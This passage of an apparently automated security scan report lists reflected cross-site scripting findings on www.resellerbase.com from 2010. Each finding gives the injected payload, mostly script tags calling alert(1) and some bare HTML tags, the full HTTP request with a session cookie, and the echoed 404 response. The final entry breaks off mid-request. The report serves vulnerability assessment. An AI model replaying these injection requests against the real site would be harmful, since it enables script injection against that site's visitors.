This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/41/rating.php63dc3<script>alert(1)</script>93df9e2b0beee2f2e?id=41&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/rating.php63dc3<script>alert(1)</script>93df9e2b0beee2f2e?id=41&rating=5 was not found on this server.</p>
...[SNIP]...

2.2915. http://www.resellerbase.com/detail/41/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 37c0a<script>alert(1)</script>6f4d0b3ba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/rating.php?37c0a<script>alert(1)</script>6f4d0b3ba4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/rating.php?37c0a<script>alert(1)</script>6f4d0b3ba4=1 was not found on this server.</p>
...[SNIP]...

2.2916. http://www.resellerbase.com/detail/41/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c7ead<script>alert(1)</script>58441959583be6b7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/41/rating.php/c7ead<script>alert(1)</script>58441959583be6b7b?id=41&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/rating.php/c7ead<script>alert(1)</script>58441959583be6b7b?id=41&rating=5 was not found on this server.</p>
...[SNIP]...

2.2917. http://www.resellerbase.com/detail/41/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dd9d7<script>alert(1)</script>380eb22f0a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildd9d7<script>alert(1)</script>380eb22f0a7/41/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildd9d7<script>alert(1)</script>380eb22f0a7/41/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2918. http://www.resellerbase.com/detail/41/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce2f7<script>alert(1)</script>2f0af4d4ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41ce2f7<script>alert(1)</script>2f0af4d4ad/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41ce2f7<script>alert(1)</script>2f0af4d4ad/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2919. http://www.resellerbase.com/detail/41/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 92eb5<script>alert(1)</script>241b218a9d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/search.php92eb5<script>alert(1)</script>241b218a9d6?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php92eb5<script>alert(1)</script>241b218a9d6?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2920. http://www.resellerbase.com/detail/41/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4d225<a>9a4d1d93371 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/search.php?keyword=search...&Submit3=Search4d225<a>9a4d1d93371&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php?keyword=search...&Submit3=Search4d225<a>9a4d1d93371&opt=2 was not found on this server.</p>
...[SNIP]...

2.2921. http://www.resellerbase.com/detail/41/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1b7bb<a>70988755916 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/search.php?keyword=search...1b7bb<a>70988755916&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php?keyword=search...1b7bb<a>70988755916&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2922. http://www.resellerbase.com/detail/41/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 46a64<script>alert(1)</script>16d4c80cb20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/search.php?keyword=search...&Submit3=Search&opt=2&46a64<script>alert(1)</script>16d4c80cb20=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php?keyword=search...&Submit3=Search&opt=2&46a64<script>alert(1)</script>16d4c80cb20=1 was not found on this server.</p>
...[SNIP]...

2.2923. http://www.resellerbase.com/detail/41/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4e12e<a>d02514c8309 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/search.php?keyword=search...&Submit3=Search&opt=24e12e<a>d02514c8309 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/search.php?keyword=search...&Submit3=Search&opt=24e12e<a>d02514c8309 was not found on this server.</p>
...[SNIP]...

2.2924. http://www.resellerbase.com/detail/41/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a845f<script>alert(1)</script>c779ff72628 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila845f<script>alert(1)</script>c779ff72628/41/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila845f<script>alert(1)</script>c779ff72628/41/themes/ was not found on this server.</p>
...[SNIP]...

2.2925. http://www.resellerbase.com/detail/41/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da975<script>alert(1)</script>cbfae70c1d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41da975<script>alert(1)</script>cbfae70c1d0/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41da975<script>alert(1)</script>cbfae70c1d0/themes/ was not found on this server.</p>
...[SNIP]...

2.2926. http://www.resellerbase.com/detail/41/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccf15<script>alert(1)</script>2fd437816e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themesccf15<script>alert(1)</script>2fd437816e2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themesccf15<script>alert(1)</script>2fd437816e2/ was not found on this server.</p>
...[SNIP]...

2.2927. http://www.resellerbase.com/detail/41/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 91d34<script>alert(1)</script>145f5385e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/?91d34<script>alert(1)</script>145f5385e7c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/?91d34<script>alert(1)</script>145f5385e7c=1 was not found on this server.</p>
...[SNIP]...

2.2928. http://www.resellerbase.com/detail/41/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b473e<script>alert(1)</script>cb5fcc06827 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb473e<script>alert(1)</script>cb5fcc06827/41/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb473e<script>alert(1)</script>cb5fcc06827/41/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2929. http://www.resellerbase.com/detail/41/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7f96<script>alert(1)</script>edf903be74c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41c7f96<script>alert(1)</script>edf903be74c/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41c7f96<script>alert(1)</script>edf903be74c/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2930. http://www.resellerbase.com/detail/41/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79dd3<script>alert(1)</script>6728b5dd69e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes79dd3<script>alert(1)</script>6728b5dd69e/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes79dd3<script>alert(1)</script>6728b5dd69e/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2931. http://www.resellerbase.com/detail/41/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aed53<script>alert(1)</script>cecd21aab12 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmosaed53<script>alert(1)</script>cecd21aab12/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmosaed53<script>alert(1)</script>cecd21aab12/ was not found on this server.</p>
...[SNIP]...

2.2932. http://www.resellerbase.com/detail/41/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7703c<script>alert(1)</script>11db0c3f01f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/?7703c<script>alert(1)</script>11db0c3f01f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/?7703c<script>alert(1)</script>11db0c3f01f=1 was not found on this server.</p>
...[SNIP]...

2.2933. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f24e<script>alert(1)</script>72d9c766973 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8f24e<script>alert(1)</script>72d9c766973/41/themes/kosmos/images/ HTTP/1.1
